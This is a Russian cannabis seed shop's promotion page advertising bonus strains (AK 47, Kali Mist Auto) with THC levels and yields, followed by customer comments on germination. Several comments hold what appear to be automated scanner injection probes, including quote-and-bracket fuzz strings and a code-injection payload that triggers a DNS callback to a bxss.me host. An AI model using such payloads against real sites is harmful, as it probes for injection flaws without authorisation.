ЗАВЕРШЕНА - +2 бонуса до конца сезона!

30 июня 2021 года

ТОП аутдор 2021

Акция ТОП Аутдор 2021 – завершена в 13:00 01.07.2021.

Покупая любые сорта из коллекции ТОП Аутдор 2021 на сумму от 6 000 рублей c 13:00 18.05.2021 до 13:00 1.07.2021, вы получите промокод topout6week, дающий право на два дополнительных семени. Еженедельно бонусы будут меняться, но все они отличные!

Промокод topout6week

На этой неделе (21.06-30.06.2021) бонусными сортами будут:

Эталон надежности

Ak 47 fem (Семяныч)
Ak 47 fem (Семяныч)
  • Фотопериодные
  • 22 %
  • Сильное возбуждение
  • Индор: 350 - 500 г/м² Аутдор: 700 - 1200 г/куст
Купить сорт

AK 47 – по-настоящему универсален. Неубиваемость и стабильность генетики придется по вкусу новичкам и тем, кто не хочет заморачиваться, а 22% мощи удовлетворят даже самых опытных. При росте в 90-150 см гибрид приносит 350 - 500 г/м². Цветение занимает 53-63 дня.

Горячая новинка

Kali Mist Auto fem (Семяныч)
Kali Mist Auto fem (Семяныч)
  • Автоцветущие
  • 23 %
  • Энергетический, веселый
  • Индор: 500 г/м² Аутдор: 70 - 220 г/куст
Купить сорт

Auto Kali Mist – это мощная (23%) сативная легенда, приносящая урожай максимально быстро. Урожай готов к харвесту через 77 дней от высадки. При росте в 70-170 см каждый куст способен выдать 70 - 220 г.

Комментарии
Растик
Как всегда на высоте.
0
Ответить
CpjJwWHV'"()&%
1
0
Ответить
'"()&%
1
0
Ответить
CpjJwWHV9911069
1
0
Ответить
acu1056<s1﹥s2ʺs3ʹuca1056
1
0
Ответить
acux1506z1z2abcxuca1506
1
0
Ответить
БаТя
Беру не первый год всё всегда на высоте!СемянычУ большое спасиба что ты есть!:)
2
Ответить
Cinik
Сначала заказал гориллу фаст бадовскую, не взошло не одного, подумал, может мой косяк, заказал гориллу от Семяныча, не взошло не одного, сказать что я расстроен, не сказать нечего, хотя до этого было все в ёлочку...
-1
Ответить
Рюриковичи мы!..
Странно... Я заказывал 3 Gorilla Auto fem (Семяныч), с ними пришли по паре бонусных орехов Gelato auto (Авто) и Zkittlez Auto (Авто). замочил все орехи 18-го вечером. На данный момент, все три Гориллы уже благополучно зеленеют каждая из своего горшка, Gelato auto (Авто) из земли уже проклюнулся один (на второй надежды крайне мало...), а вот оба Zkittlez Auto (Авто) проклюнулись между влажных ватных дисков, да так и замерли с корешками 0,5-1 мм...(Обратился в Службу Поддержки, обещали со следующим моим заказом прислать три дополнительных бонусных ореха.)
0
Ответить
999777
У меня подарочные скителз 3 штуки все взошли, одну подарил, а две растут, обе больше всех остальных в разы просто
0
Ответить
e
'.gethostbyname(lc('hitgj'.'uwtbnhik38b82.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(90).chr(103).chr(74).'
0
Ответить
Groower
Семяныч ага тащит, брал в этом году на groowers 3 семки+1бонус взошел только бонусный, то что купил не дало не каких плодов?
-1
Ответить
Afgan Kush
Всем привет!Два семечка Афган куш не взошли
0
Ответить
Здравствуйте! В нашем магазине действует гарантия на семена. Пожалуйста, напишите нам в чат на сайте или на почту [email protected]. Время работы отдела качества с 8.00 до 22.00 по Мск времени
1
Ответить
ТЕРМИТ
Из автика вылез мужык сегодня кознили из бонусных. был спор прислали другие хорошая работа менеджеров всем добра!
1
Ответить
BeS
Ну что тут сказать?!!!семяныч и вправду отличный seed шоп:) два года уже покупаю семяна.всхожесть 100%,всех семян что в оригенальных пачках!!! Заказывал на Растараше,там дешевле,но всхожесть 50/50.короче по моему мнению.только семяныч!!!!!!!
1
Ответить
Rast
От души Семяныч. Бонусы всегда радуют, особенно такие вкусные)
0
Ответить
Карамель
Карамель открывается, чует, что вылупилась в России и шлет гровера на три буквы.
3
Ответить
Ссущий кот
Да да. У меня бонусная карамелька не взошла. И не у меня одного. Семечко проклюнулось, лопнуло. Всё.
2
Ответить
Лёха
У меня четко проросла и растёт
0
Ответить
Это я
Пришло 8 семечек вместе с бонусными все воткнул по инструкции, взошли все растут быстро на удивление хотя я новичëк, так что надеюсь на зиму буду упакован
0
Ответить
Rasta
Дай инструкцию
0
Ответить
Садовод Новичок
У меня бонусные карамель взошла. Понравилась и вкус и запаха мало. Решил заказать ещё из 3 взошло 1, а два других лопнули и всё ?
0
Ответить
Gorila
В этом году заказал Gorilla glue с бонусными 7 Семак ростки только три .4 семки корень показали а потом изчезли .заказал Sumo seeds.тоже есть побочные эффекты .за прошлогодние семена писал в службу гарантии таз задают такие вопросы ..тяжело отвечать почему две взошли а третья нет
0
Ответить
АS
Семяныч топ! Всегда бонусы всякие и плюшки . Спасибо Семяныч ?? процветания !
0
Ответить